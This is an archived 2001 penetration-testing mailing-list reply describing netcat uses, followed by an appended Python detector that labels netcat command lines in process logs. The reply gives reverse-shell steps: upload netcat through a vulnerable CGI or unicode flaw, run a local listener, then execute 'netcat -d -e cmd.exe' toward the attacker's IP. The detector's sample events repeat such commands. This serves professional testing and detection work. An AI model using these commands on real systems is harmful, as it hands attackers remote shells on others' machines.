Penetration Testing mailing list archives

Re: Ideas on netcat


From: Forrest Rae <forrest () code-lab com>
Date: Tue, 28 Aug 2001 10:47:54 -0500

Hi Kartik,

One use is sending a shell back to yourself.    

First, upload netcat to a remote server via unicode, a vulnerable CGI,
or various other methods.  Second, on your local computer run netcat in
listen mode.

$ netcat -l -p 8888

Third, execute netcat on the remote server such that it sends a connection
back to you.  This is assuming that you can execute programs on the
remote server.  If X is installed on the remote server you can send back an
xterm or rxvt, which is a little less complicated.  This command may
not be 100% correct, I am in a bit of a rush right now, I apologize.

netcat -d -e cmd.exe X.X.X.X 8888       (X.X.X.X is your IP)

The netcat listener you set up should display something like this:

XiXrXsXft XiXdoXs XXXX [Version X.XX.XXXX]
(X) CXpXrXgXt 1985-1900 XiXrXsXft CXrX.

X:\>

This method can vary in several ways.  Instead of sending a connection back
to your local computer, you can also set up a listener on the remote
server, assuming the remote server isn't firewalled.

I am also interested in other ways people use netcat in pen testing. 
Would anyone else care to share?

-Forrest

Vo0d0o wrote:
I would be grateful if anybody could throw some light on uses of netcat in 
pen-testing.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
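
Added example, not part of the message above or of the list archive: a defender's view of the command lines it describes, labelling netcat invocations in process-creation logs by their -l and -e flags. The function names, hosts, paths and sample events are constructed, and the parser assumes traditional netcat short options and a binary that keeps a standard netcat name.

```python
import shlex
from pathlib import PureWindowsPath

NETCAT_NAMES = {"nc", "netcat"}   # assumption: binary keeps a standard netcat name
TAKES_ARG = set("egGiopsw")       # traditional netcat options that consume a value

def classify(cmdline):
    """Label one process command line: reverse-shell, bind-shell, listener or None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:
        return None
    if not argv or PureWindowsPath(argv[0].strip('"')).stem.lower() not in NETCAT_NAMES:
        return None
    listen, program, positional, i = False, None, [], 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            for j, ch in enumerate(tok[1:], start=1):  # handles clustered flags like -lp
                if ch == "l":
                    listen = True
                elif ch in TAKES_ARG:
                    value = tok[j + 1:]  # value glued to the flag, else the next token
                    if not value and i + 1 < len(argv):
                        i += 1
                        value = argv[i]
                    if ch == "e":
                        program = value
                    break
        else:
            positional.append(tok)
        i += 1
    if program and listen:
        return "bind-shell"       # -l with -e: a program is served on the host itself
    if program and len(positional) >= 2:
        return "reverse-shell"    # -e plus host and port: a program is attached outbound
    return "listener" if listen else None

# Constructed process-creation events (host, command line); IPs are documentation ranges.
SAMPLE_EVENTS = [
    ("web01", r"C:\temp\netcat.exe -d -e cmd.exe 192.0.2.10 8888"),
    ("web01", r"C:\temp\nc.exe -l -p 8888 -e cmd.exe"),
    ("ws-17", "netcat -l -p 8888"),
    ("ws-17", "nc -z -w 2 192.0.2.20 80"),
]

def scan(events):
    """Return (host, label, cmdline) for every event that classify() flags."""
    return [(h, label, c) for h, c in events if (label := classify(c))]
```

scan(SAMPLE_EVENTS) returns the first three events; a bare listener on a workstation is lower severity than -e on a server, so triage on the label together with the host's role.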

